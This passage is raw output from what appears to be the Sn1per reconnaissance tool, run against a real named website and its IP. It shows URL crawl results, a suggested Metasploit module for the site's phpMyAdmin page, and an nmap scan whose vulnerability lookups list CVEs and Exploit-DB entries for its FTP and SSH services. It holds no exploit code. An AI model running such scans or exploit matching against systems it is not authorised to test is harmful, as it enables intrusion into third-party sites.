10138|_[ + ] Exploit::
10139|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10140|_[ + ] More details:: / - / , ISP:
10141|_[ + ] Found:: UNIDENTIFIED
10142
10143 _[ - ]::--------------------------------------------------------------------------------------------------------------
10144|_[ + ] [ 81 / 100 ]-[03:59:08] [ - ]
10145|_[ + ] Target:: [ http://idolblog.tv/page/68/ ]
10146|_[ + ] Exploit::
10147|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10148|_[ + ] More details:: / - / , ISP:
10149|_[ + ] Found:: UNIDENTIFIED
10150
10151 _[ - ]::--------------------------------------------------------------------------------------------------------------
10152|_[ + ] [ 82 / 100 ]-[03:59:12] [ - ]
10153|_[ + ] Target:: [ http://idolblog.tv/tag/erika/ ]
10154|_[ + ] Exploit::
10155|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10156|_[ + ] More details:: / - / , ISP:
10157|_[ + ] Found:: UNIDENTIFIED
10158
10159 _[ - ]::--------------------------------------------------------------------------------------------------------------
10160|_[ + ] [ 83 / 100 ]-[03:59:17] [ - ]
10161|_[ + ] Target:: [ http://idolblog.tv/page/109/ ]
10162|_[ + ] Exploit::
10163|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10164|_[ + ] More details:: / - / , ISP:
10165|_[ + ] Found:: UNIDENTIFIED
10166
10167 _[ - ]::--------------------------------------------------------------------------------------------------------------
10168|_[ + ] [ 84 / 100 ]-[03:59:21] [ - ]
10169|_[ + ] Target:: [ http://idolblog.tv/category/photobooks/ ]
10170|_[ + ] Exploit::
10171|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10172|_[ + ] More details:: / - / , ISP:
10173|_[ + ] Found:: UNIDENTIFIED
10174
10175 _[ - ]::--------------------------------------------------------------------------------------------------------------
10176|_[ + ] [ 85 / 100 ]-[03:59:25] [ - ]
10177|_[ + ] Target:: [ http://idolblog.tv/page/115/ ]
10178|_[ + ] Exploit::
10179|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10180|_[ + ] More details:: / - / , ISP:
10181|_[ + ] Found:: UNIDENTIFIED
10182
10183 _[ - ]::--------------------------------------------------------------------------------------------------------------
10184|_[ + ] [ 86 / 100 ]-[03:59:29] [ - ]
10185|_[ + ] Target:: [ http://idolblog.tv/page/26/ ]
10186|_[ + ] Exploit::
10187|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10188|_[ + ] More details:: / - / , ISP:
10189|_[ + ] Found:: UNIDENTIFIED
10190
10191 _[ - ]::--------------------------------------------------------------------------------------------------------------
10192|_[ + ] [ 87 / 100 ]-[03:59:33] [ - ]
10193|_[ + ] Target:: [ http://idolblog.tv/page/32/ ]
10194|_[ + ] Exploit::
10195|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10196|_[ + ] More details:: / - / , ISP:
10197|_[ + ] Found:: UNIDENTIFIED
10198
10199 _[ - ]::--------------------------------------------------------------------------------------------------------------
10200|_[ + ] [ 88 / 100 ]-[03:59:37] [ - ]
10201|_[ + ] Target:: [ http://idolblog.tv/page/27/ ]
10202|_[ + ] Exploit::
10203|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10204|_[ + ] More details:: / - / , ISP:
10205|_[ + ] Found:: UNIDENTIFIED
10206
10207 _[ - ]::--------------------------------------------------------------------------------------------------------------
10208|_[ + ] [ 89 / 100 ]-[03:59:41] [ - ]
10209|_[ + ] Target:: [ http://idolblog.tv/page/52/ ]
10210|_[ + ] Exploit::
10211|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10212|_[ + ] More details:: / - / , ISP:
10213|_[ + ] Found:: UNIDENTIFIED
10214
10215 _[ - ]::--------------------------------------------------------------------------------------------------------------
10216|_[ + ] [ 90 / 100 ]-[03:59:46] [ - ]
10217|_[ + ] Target:: [ http://idolblog.tv/page/85/ ]
10218|_[ + ] Exploit::
10219|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10220|_[ + ] More details:: / - / , ISP:
10221|_[ + ] Found:: UNIDENTIFIED
10222
10223 _[ - ]::--------------------------------------------------------------------------------------------------------------
10224|_[ + ] [ 91 / 100 ]-[03:59:50] [ - ]
10225|_[ + ] Target:: [ http://idolblog.tv/page/10/ ]
10226|_[ + ] Exploit::
10227|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10228|_[ + ] More details:: / - / , ISP:
10229|_[ + ] Found:: UNIDENTIFIED
10230
10231 _[ - ]::--------------------------------------------------------------------------------------------------------------
10232|_[ + ] [ 92 / 100 ]-[03:59:55] [ - ]
10233|_[ + ] Target:: [ http://idolblog.tv/author/idolblog/ ]
10234|_[ + ] Exploit::
10235|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10236|_[ + ] More details:: / - / , ISP:
10237|_[ + ] Found:: UNIDENTIFIED
10238
10239 _[ - ]::--------------------------------------------------------------------------------------------------------------
10240|_[ + ] [ 93 / 100 ]-[03:59:59] [ - ]
10241|_[ + ] Target:: [ http://idolblog.tv/page/157/ ]
10242|_[ + ] Exploit::
10243|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10244|_[ + ] More details:: / - / , ISP:
10245|_[ + ] Found:: UNIDENTIFIED
10246
10247 _[ - ]::--------------------------------------------------------------------------------------------------------------
10248|_[ + ] [ 94 / 100 ]-[04:00:04] [ - ]
10249|_[ + ] Target:: [ http://idolblog.tv/page/103/ ]
10250|_[ + ] Exploit::
10251|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10252|_[ + ] More details:: / - / , ISP:
10253|_[ + ] Found:: UNIDENTIFIED
10254
10255 _[ - ]::--------------------------------------------------------------------------------------------------------------
10256|_[ + ] [ 95 / 100 ]-[04:00:08] [ - ]
10257|_[ + ] Target:: [ http://idolblog.tv/page/63/ ]
10258|_[ + ] Exploit::
10259|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10260|_[ + ] More details:: / - / , ISP:
10261|_[ + ] Found:: UNIDENTIFIED
10262
10263 _[ - ]::--------------------------------------------------------------------------------------------------------------
10264|_[ + ] [ 96 / 100 ]-[04:00:13] [ - ]
10265|_[ + ] Target:: [ http://idolblog.tv/category/other/ ]
10266|_[ + ] Exploit::
10267|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10268|_[ + ] More details:: / - / , ISP:
10269|_[ + ] Found:: UNIDENTIFIED
10270
10271 _[ - ]::--------------------------------------------------------------------------------------------------------------
10272|_[ + ] [ 97 / 100 ]-[04:00:17] [ - ]
10273|_[ + ] Target:: [ http://idolblog.tv/page/129/ ]
10274|_[ + ] Exploit::
10275|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10276|_[ + ] More details:: / - / , ISP:
10277|_[ + ] Found:: UNIDENTIFIED
10278
10279 _[ - ]::--------------------------------------------------------------------------------------------------------------
10280|_[ + ] [ 98 / 100 ]-[04:00:21] [ - ]
10281|_[ + ] Target:: [ http://idolblog.tv/page/9/ ]
10282|_[ + ] Exploit::
10283|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10284|_[ + ] More details:: / - / , ISP:
10285|_[ + ] Found:: UNIDENTIFIED
10286
10287 _[ - ]::--------------------------------------------------------------------------------------------------------------
10288|_[ + ] [ 99 / 100 ]-[04:00:26] [ - ]
10289|_[ + ] Target:: [ http://idolblog.tv/page/133/ ]
10290|_[ + ] Exploit::
10291|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10292|_[ + ] More details:: / - / , ISP:
10293|_[ + ] Found:: UNIDENTIFIED
10294
10295[ INFO ] [ Shutting down ]
10296[ INFO ] [ End of process INURLBR at [20-07-2019 04:00:26]
10297[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
10298[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/idolblog.tv/output/inurlbr-idolblog.tv ]
10299|_________________________________________________________________________________________
10300
10301\_________________________________________________________________________________________/
10302#####################################################################################################################################
10303-+--------------------------------------------------+-----------+-----------+
10304| App Name | URL to Application | Potential Exploit | Username | Password |
10305+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
10306| phpMyAdmin | https://89.248.174.131:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
10307+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
10308#######################################################################################################################################
10309Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 04:04 EDT
10310NSE: Loaded 45 scripts for scanning.
10311NSE: Script Pre-scanning.
10312NSE: Starting runlevel 1 (of 2) scan.
10313Initiating NSE at 04:04
10314Completed NSE at 04:04, 0.00s elapsed
10315NSE: Starting runlevel 2 (of 2) scan.
10316Initiating NSE at 04:04
10317Completed NSE at 04:04, 0.00s elapsed
10318Initiating Ping Scan at 04:04
10319Scanning idolblog.tv (89.248.174.131) [4 ports]
10320Completed Ping Scan at 04:04, 0.27s elapsed (1 total hosts)
10321Initiating Parallel DNS resolution of 1 host. at 04:04
10322Completed Parallel DNS resolution of 1 host. at 04:04, 0.03s elapsed
10323Initiating Connect Scan at 04:04
10324Scanning idolblog.tv (89.248.174.131) [65535 ports]
10325Discovered open port 21/tcp on 89.248.174.131
10326Discovered open port 3306/tcp on 89.248.174.131
10327Discovered open port 22/tcp on 89.248.174.131
10328Discovered open port 993/tcp on 89.248.174.131
10329Discovered open port 443/tcp on 89.248.174.131
10330Discovered open port 587/tcp on 89.248.174.131
10331Discovered open port 80/tcp on 89.248.174.131
10332Discovered open port 53/tcp on 89.248.174.131
10333Discovered open port 995/tcp on 89.248.174.131
10334Discovered open port 110/tcp on 89.248.174.131
10335Discovered open port 143/tcp on 89.248.174.131
10336Discovered open port 111/tcp on 89.248.174.131
10337Connect Scan Timing: About 5.80% done; ETC: 04:13 (0:08:23 remaining)
10338Discovered open port 2222/tcp on 89.248.174.131
10339Connect Scan Timing: About 11.57% done; ETC: 04:13 (0:07:46 remaining)
10340Discovered open port 465/tcp on 89.248.174.131
10341Connect Scan Timing: About 22.48% done; ETC: 04:11 (0:05:14 remaining)
10342Connect Scan Timing: About 19.87% done; ETC: 04:14 (0:08:08 remaining)
10343Connect Scan Timing: About 24.91% done; ETC: 04:14 (0:07:35 remaining)
10344Connect Scan Timing: About 33.01% done; ETC: 04:13 (0:06:07 remaining)
10345Connect Scan Timing: About 40.59% done; ETC: 04:13 (0:05:09 remaining)
10346Connect Scan Timing: About 48.43% done; ETC: 04:12 (0:04:17 remaining)
10347Connect Scan Timing: About 56.80% done; ETC: 04:12 (0:03:26 remaining)
10348Connect Scan Timing: About 63.47% done; ETC: 04:12 (0:02:53 remaining)
10349Connect Scan Timing: About 72.99% done; ETC: 04:11 (0:02:03 remaining)
10350Connect Scan Timing: About 84.64% done; ETC: 04:11 (0:01:06 remaining)
10351Completed Connect Scan at 04:11, 404.40s elapsed (65535 total ports)
10352Initiating Service scan at 04:11
10353Scanning 14 services on idolblog.tv (89.248.174.131)
10354Completed Service scan at 04:11, 17.16s elapsed (14 services on 1 host)
10355Initiating OS detection (try #1) against idolblog.tv (89.248.174.131)
10356Retrying OS detection (try #2) against idolblog.tv (89.248.174.131)
10357Initiating Traceroute at 04:11
10358Completed Traceroute at 04:11, 3.02s elapsed
10359Initiating Parallel DNS resolution of 9 hosts. at 04:11
10360Completed Parallel DNS resolution of 9 hosts. at 04:11, 0.31s elapsed
10361NSE: Script scanning 89.248.174.131.
10362NSE: Starting runlevel 1 (of 2) scan.
10363Initiating NSE at 04:11
10364NSE Timing: About 96.92% done; ETC: 04:12 (0:00:01 remaining)
10365Completed NSE at 04:12, 42.33s elapsed
10366NSE: Starting runlevel 2 (of 2) scan.
10367Initiating NSE at 04:12
10368Completed NSE at 04:12, 0.50s elapsed
10369Nmap scan report for idolblog.tv (89.248.174.131)
10370Host is up, received reset ttl 56 (0.24s latency).
10371Scanned at 2019-07-20 04:04:20 EDT for 473s
10372Not shown: 55625 filtered ports, 9896 closed ports
10373Reason: 55625 no-responses and 9896 conn-refused
10374PORT STATE SERVICE REASON VERSION
1037521/tcp open ftp syn-ack Pure-FTPd
10376| vulscan: VulDB - https://vuldb.com:
10377| [102925] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface pureftpd.passwd HTTP Request privilege escalation
10378| [57510] Pureftpd Pure-FTPd up to 0.x Memory Consumption denial of service
10379| [57504] Pureftpd Pure-FTPd up to 0.x ftp_parser.c Cleartext unknown vulnerability
10380|
10381| MITRE CVE - https://cve.mitre.org:
10382| [CVE-2004-0656] The accept_client function in PureFTPd 1.0.18 and earlier allows remote attackers to cause a denial of service by exceeding the maximum number of connections.
10383|
10384| SecurityFocus - https://www.securityfocus.com/bid/:
10385| [10664] PureFTPd Accept_Client Remote Denial of Service Vulnerability
10386|
10387| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10388| No findings
10389|
10390| Exploit-DB - https://www.exploit-db.com:
10391| No findings
10392|
10393| OpenVAS (Nessus) - http://www.openvas.org:
10394| No findings
10395|
10396| SecurityTracker - https://www.securitytracker.com:
10397| [1010701] PureFTPd Logic Bug in accept_client() Lets Remote Users Crash the FTP Daemon
10398| [1008135] (Claim is Retracted) PureFTPd Buffer Overflow in displayrate() Lets Remote Users Crash the Service
10399| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
10400| [1001126] PureFTPd May Allow Remote Users to Deny Service on the Server
10401|
10402| OSVDB - http://www.osvdb.org:
10403| No findings
10404|_
1040522/tcp open ssh syn-ack OpenSSH 7.4 (protocol 2.0)
10406| vulners:
10407| cpe:/a:openbsd:openssh:7.4:
10408| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
10409|_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
10410| vulscan: VulDB - https://vuldb.com:
10411| [130671] gsi-openssh-server 7.9p1 on Fedora /etc/gsissh/sshd_config weak authentication
10412| [130371] OpenSSH 7.9 scp Man-in-the-Middle directory traversal
10413| [130370] OpenSSH 7.9 Man-in-the-Middle spoofing
10414| [130369] OpenSSH 7.9 Encoding progressmeter.c refresh_progress_meter() spoofing
10415| [129007] OpenSSH 7.9 scp Client scp.c Filename privilege escalation
10416| [123343] OpenSSH up to 7.8 GSS2 auth-gss2.c information disclosure
10417| [123011] OpenSSH up to 7.7 auth2-gss.c Request information disclosure
10418| [112267] OpenSSH up to 7.3 sshd kex.c/packet.c NEWKEYS Message denial of service
10419| [108627] OpenSSH up to 7.5 Readonly Mode sftp-server.c process_open unknown vulnerability
10420| [94611] OpenSSH up to 7.3 Access Control privilege escalation
10421| [94610] OpenSSH up to 7.3 Shared Memory Manager privilege escalation
10422| [94608] OpenSSH up to 7.3 Unix-Domain Socket privilege escalation
10423| [94607] OpenSSH up to 7.3 Forwarded Agent Channel privilege escalation
10424| [90671] OpenSSH up to 7.2 auth-passwd.c auth_password denial of service
10425| [90405] OpenSSH up to 7.2p2 sshd information disclosure
10426| [90404] OpenSSH up to 7.2p2 sshd information disclosure
10427| [90403] OpenSSH up to 7.2p2 sshd CPU Exhaustion denial of service
10428| [89622] OpenSSH 7.2p2 Authentication Username information disclosure
10429| [81320] OpenSSH up to 7.2p1 X11 Authentication Credential xauth privilege escalation
10430| [80656] OpenBSD OpenSSH 7.1 X11 Forwarding privilege escalation
10431| [80330] OpenSSH up to 7.1p1 packet.c ssh_packet_read_poll2 memory corruption
10432|
10433| MITRE CVE - https://cve.mitre.org:
10434| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
10435| [CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6.
10436|
10437| SecurityFocus - https://www.securityfocus.com/bid/:
10438| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
10439| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
10440| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
10441| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
10442| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
10443| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
10444| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
10445| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
10446| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
10447| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
10448| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
10449| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
10450| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
10451| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
10452| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
10453| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
10454| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
10455| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
10456| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
10457| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
10458| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
10459| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
10460| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
10461| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
10462| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
10463| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
10464| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
10465| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
10466| [75990] OpenSSH Login Handling Security Bypass Weakness
10467| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
10468| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
10469| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
10470| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
10471| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
10472| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
10473| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
10474| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
10475| [61286] OpenSSH Remote Denial of Service Vulnerability
10476| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
10477| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
10478| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
10479| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
10480| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
10481| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
10482| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
10483| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
10484| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
10485| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
10486| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
10487| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
10488| [30794] Red Hat OpenSSH Backdoor Vulnerability
10489| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
10490| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
10491| [28531] OpenSSH ForceCommand Command Execution Weakness
10492| [28444] OpenSSH X Connections Session Hijacking Vulnerability
10493| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
10494| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
10495| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
10496| [20956] OpenSSH Privilege Separation Key Signature Weakness
10497| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
10498| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
10499| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
10500| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
10501| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
10502| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
10503| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
10504| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
10505| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
10506| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
10507| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
10508| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
10509| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
10510| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
10511| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
10512| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
10513| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
10514| [6168] OpenSSH Visible Password Vulnerability
10515| [5374] OpenSSH Trojan Horse Vulnerability
10516| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
10517| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
10518| [4241] OpenSSH Channel Code Off-By-One Vulnerability
10519| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
10520| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
10521| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
10522| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
10523| [2917] OpenSSH PAM Session Evasion Vulnerability
10524| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
10525| [2356] OpenSSH Private Key Authentication Check Vulnerability
10526| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
10527| [1334] OpenSSH UseLogin Vulnerability
10528|
10529| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10530| [83258] GSI-OpenSSH auth-pam.c security bypass
10531| [82781] OpenSSH time limit denial of service
10532| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
10533| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
10534| [72756] Debian openssh-server commands information disclosure
10535| [68339] OpenSSH pam_thread buffer overflow
10536| [67264] OpenSSH ssh-keysign unauthorized access
10537| [65910] OpenSSH remote_glob function denial of service
10538| [65163] OpenSSH certificate information disclosure
10539| [64387] OpenSSH J-PAKE security bypass
10540| [63337] Cisco Unified Videoconferencing OpenSSH weak security
10541| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
10542| [45202] OpenSSH signal handler denial of service
10543| [44747] RHEL OpenSSH backdoor
10544| [44280] OpenSSH PermitRootLogin information disclosure
10545| [44279] OpenSSH sshd weak security
10546| [44037] OpenSSH sshd SELinux role unauthorized access
10547| [43940] OpenSSH X11 forwarding information disclosure
10548| [41549] OpenSSH ForceCommand directive security bypass
10549| [41438] OpenSSH sshd session hijacking
10550| [40897] OpenSSH known_hosts weak security
10551| [40587] OpenSSH username weak security
10552| [37371] OpenSSH username data manipulation
10553| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
10554| [37112] RHSA update for OpenSSH signal handler race condition not installed
10555| [37107] RHSA update for OpenSSH identical block denial of service not installed
10556| [36637] OpenSSH X11 cookie privilege escalation
10557| [35167] OpenSSH packet.c newkeys[mode] denial of service
10558| [34490] OpenSSH OPIE information disclosure
10559| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
10560| [32975] Apple Mac OS X OpenSSH denial of service
10561| [32387] RHSA-2006:0738 updates for openssh not installed
10562| [32359] RHSA-2006:0697 updates for openssh not installed
10563| [32230] RHSA-2006:0298 updates for openssh not installed
10564| [32132] RHSA-2006:0044 updates for openssh not installed
10565| [30120] OpenSSH privilege separation monitor authentication verification weakness
10566| [29255] OpenSSH GSSAPI user enumeration
10567| [29254] OpenSSH signal handler race condition
10568| [29158] OpenSSH identical block denial of service
10569| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
10570| [25116] OpenSSH OpenPAM denial of service
10571| [24305] OpenSSH SCP shell expansion command execution
10572| [22665] RHSA-2005:106 updates for openssh not installed
10573| [22117] OpenSSH GSSAPI allows elevated privileges
10574| [22115] OpenSSH GatewayPorts security bypass
10575| [20930] OpenSSH sshd.c LoginGraceTime denial of service
10576| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
10577| [17213] OpenSSH allows port bouncing attacks
10578| [16323] OpenSSH scp file overwrite
10579| [13797] OpenSSH PAM information leak
10580| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
10581| [13264] OpenSSH PAM code could allow an attacker to gain access
10582| [13215] OpenSSH buffer management errors could allow an attacker to execute code
10583| [13214] OpenSSH memory vulnerabilities
10584| [13191] OpenSSH large packet buffer overflow
10585| [12196] OpenSSH could allow an attacker to bypass login restrictions
10586| [11970] OpenSSH could allow an attacker to obtain valid administrative account
10587| [11902] OpenSSH PAM support enabled information leak
10588| [9803] OpenSSH "
10589| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
10590| [9307] OpenSSH is running on the system
10591| [9169] OpenSSH "
10592| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
10593| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
10594| [8383] OpenSSH off-by-one error in channel code
10595| [7647] OpenSSH UseLogin option arbitrary code execution
10596| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
10597| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
10598| [7179] OpenSSH source IP access control bypass
10599| [6757] OpenSSH "
10600| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
10601| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
10602| [5517] OpenSSH allows unauthorized access to resources
10603| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
10604|
10605| Exploit-DB - https://www.exploit-db.com:
10606| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
10607| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
10608| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
10609| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
10610| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
10611| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
10612| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
10613| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
10614| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
10615| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
10616| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
10617| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
10618| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
10619| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
10620|
10621| OpenVAS (Nessus) - http://www.openvas.org:
10622| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
